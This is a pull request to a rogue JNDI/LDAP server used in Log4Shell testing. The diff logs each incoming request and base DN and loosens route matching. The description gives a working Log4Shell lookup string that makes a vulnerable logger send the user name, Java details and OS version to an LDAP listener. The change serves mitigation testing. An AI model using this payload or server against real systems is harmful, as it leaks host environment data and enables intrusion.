### PR TITLE
Log request and base DN to validate Log4Shell information leakage attack vector

### DIFF
--- a/src/main/java/artsploit/LdapServer.java
+++ b/src/main/java/artsploit/LdapServer.java
@@ -83,7 +83,7 @@ class LdapServer extends InMemoryOperationInterceptor {
         //find controller
         for(String key: routes.keySet()) {
             // compare using contains
-            if(base.contains(key)) {
+            if (base.contains(key) && key.length() > 0 || key.equals(base)) {
                 controller = routes.get(key);
                 break;
             }

--- a/src/main/java/artsploit/LdapServer.java
+++ b/src/main/java/artsploit/LdapServer.java
@@ -85,6 +85,10 @@ class LdapServer extends InMemoryOperationInterceptor {
                 break;
             }
         }
+        if (controller == null) {
+            System.out.println("No controller for base '" + base + "', falling back to default.");
+            controller = routes.get("");
+        }
         try {
             controller.sendResult(result, base);
         } catch (Exception e1) {

--- a/src/main/java/artsploit/LdapServer.java
+++ b/src/main/java/artsploit/LdapServer.java
@@ -7,6 +7,7 @@ import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
 import com.unboundid.ldap.listener.InMemoryListenerConfig;
 import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
 import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;
+import com.unboundid.ldap.sdk.ReadOnlySearchRequest;
 import org.reflections.Reflections;
 
 import javax.net.ServerSocketFactory;
@@ -71,12 +72,15 @@ class LdapServer extends InMemoryOperationInterceptor {
      */
     @Override
     public void processSearchResult(InMemoryInterceptedSearchResult result) {
-        String base = result.getRequest().getBaseDN();
+        ReadOnlySearchRequest request = result.getRequest();
+        String base = request.getBaseDN();
+        System.out.println("request: " + request);
+        System.out.println("base: " + base);
         LdapController controller = null;
         //find controller
         for(String key: routes.keySet()) {
-            //compare using wildcard at the end
-            if(key.equals(base) || key.endsWith("*") && base.startsWith(key.substring(0, key.length()-1))) {
+            // compare using contains
+            if(base.contains(key)) {
                 controller = routes.get(key);
                 break;
             }

--- a/src/main/java/artsploit/LdapServer.java
+++ b/src/main/java/artsploit/LdapServer.java
@@ -99,6 +99,21 @@ class LdapServer extends InMemoryOperationInterceptor {
         }
     }
 
+    // uses reflection to get the remote address of the client
+    // since the required method isn't available on the public API
+    private String getRemoteAddress(InMemoryInterceptedSearchResult result) {
+        if (getSocketMethod == null || getClientConnectionMethod == null) {
+            return null;
+        }
+        try {
+            Socket clientConnection = (Socket) getSocketMethod.invoke(getClientConnectionMethod.invoke(result));
+            return clientConnection.getRemoteSocketAddress().toString();
+        } catch (Exception e) {
+            e.printStackTrace();
+            return null;
+        }
+    }
+
     private static Method getClientConnectionMethod;
     private static Method getSocketMethod;
 
@@ -112,17 +127,6 @@ class LdapServer extends InMemoryOperationInterceptor {
             getSocketMethod.setAccessible(true);
         } catch (ClassNotFoundException | NoSuchMethodException e) {
             e.printStackTrace();
-            getClientConnectionMethod = null;
-        }
-    }
-
-    private String getRemoteAddress(InMemoryInterceptedSearchResult result) {
-        try {
-            Socket clientConnection = (Socket) getSocketMethod.invoke(getClientConnectionMethod.invoke(result));
-            return clientConnection.getRemoteSocketAddress().toString();
-        } catch (Exception e) {
-            e.printStackTrace();
-            return null;
         }
     }
 }


### PR DESCRIPTION
### Motivation

For testing Log4Shell information leakage attack vector with inputs such as  `${jndi:ldap://127.0.1.1:1389/user=${env:USER},vendor=${sys:java.vendor},javaversion=${sys:java.vm.version},os=${sys:os.version}}`
Suitable for usage with [log4shell-mitigation-tester](https://github.com/lhotari/log4shell-mitigation-tester/blob/master/README.md#exploiting-with-rogue-jndi). Strictly meant for white hat purposes and for understanding Log4Shell.

### Modifications

* Log request and base for each request
* match controller with simple contains check